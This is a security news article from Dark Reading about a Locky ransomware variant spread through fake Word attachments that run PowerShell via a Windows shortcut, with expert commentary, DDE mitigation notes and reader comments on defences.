Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


03:10 PM
Connect Directly

New Locky Ransomware Takes Another Turn

A newly discovered strain of Locky ransomware has been discovered masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications like Microsoft Word and Libre Office.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky has the same ".asasin" extension as a strain PhishMe picked up in October. However, it's crafted to manipulate users with a reportedly "protected document" disguised as this:

(Image: Avira)

(Image: Avira)

Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the ".asasin" file extension name. Multiple other files, with payment details, are written onto the disk.

Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.

Once it's on the victim's machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.

"We are seeing a rapid evolution in the way Locky is delivered," says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. "Locky stays the same, but the delivery techniques is where we've really seen the most change."

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

"Locky has been one of the most popular malware libraries for a long time," says John Pironti, president of IP Architects. "It has been maturing, and that doesn't surprise me because it has been successful in financial gain."

It's common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It's "misleading" to call this recent finding a new strain of Locky, Griffin adds. The ".asasin" strain, which PhishMe also detected, is a more robust and more verbose script application delivery than other forms of Locky seen in the past. It collects basic information off the machine; nothing personally identifiable. This is the same malware arriving on a different path.

"We've seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages," Pironti says. People are more likely to open an attachment, the vector in Avira's finding, than they are to click a link.

"We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments," Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren't as suspicious as a potentially phishy link.

He notes that the ".asasin" extension is amusing. "They want to work off fear and force people to pay," he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They're taking advantage of the fact that phishing emails, while basic, work. "Why would they choose a really complex, sophisticated, unreliable means of delivering malware?" he says.

Defending against fake applications

Griffiin points out that this is a clear example of abuse of Microsoft's Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Apprentice
11/13/2017 | 8:52:08 AM
Possible Improvised Solution
  • At my company we supported 200 client's IT Infrastructure. Well, at least 1 client a week was getting infected with locky, luckily we had backups in each case. However it was still concerning that locky was slipping past the security controls in place. So we developed a "programmitic Block" which prevents any files from writing to the appdata folder. 
  • So, we figured out that for most strains of locky they will right to the appdata folder for install by default. So we just prevent anything from writing to this folder. It has created a few issues but we irnoed those out. It has been working for the clients for  year now. No New infections since it was implemented.
User Rank: Apprentice
11/11/2017 | 9:28:51 AM
Locky Ransomware attacks
This attack is of very dengerous kind. If your file is locked with locky then your had lost your data and no ways to recover, only the way is if you have the backup of your data then ok.

I faced this situation three times and found that if it enters into your network then only the option is to identify the sytem and remove it immediately form the network else your Network PCs data are going into the dustbin.Sometimes it also encrypt the video and audio files but depending on the programs files formats going to be affecting.

The best way is to use your network safely with proper antivirus and don't install the unnecessary programs and adwares which have the loopholes into its design architecture. If your are a tech giant and want to face the such an problem then you can try locky..... GOOD luck and happy readings.


7 Old IT Things Every New InfoSec Pro Should Know
Joan Goodchild, Staff Editor,  4/20/2021
Cloud-Native Businesses Struggle With Security
Robert Lemos, Contributing Writer,  5/6/2021
Defending Against Web Scraping Attacks
Rob Simon, Principal Security Consultant at TrustedSec,  5/7/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: What Virtual Reality phishing attacks will look like in 2030.
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-05-11
A cross-site request forgery (CSRF) vulnerability in Jenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
PUBLISHED: 2021-05-11
Jenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not perform a permission check in an HTTP endpoint, allowing with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.
PUBLISHED: 2021-05-11
Jenkins P4 Plugin 1.11.4 and earlier does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password.
PUBLISHED: 2021-05-11
A cross-site request forgery (CSRF) vulnerability in Jenkins P4 Plugin 1.11.4 and earlier allows attackers to connect to an attacker-specified Perforce server using attacker-specified username and password.
PUBLISHED: 2021-05-11
Jenkins Xcode integration Plugin 2.0.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.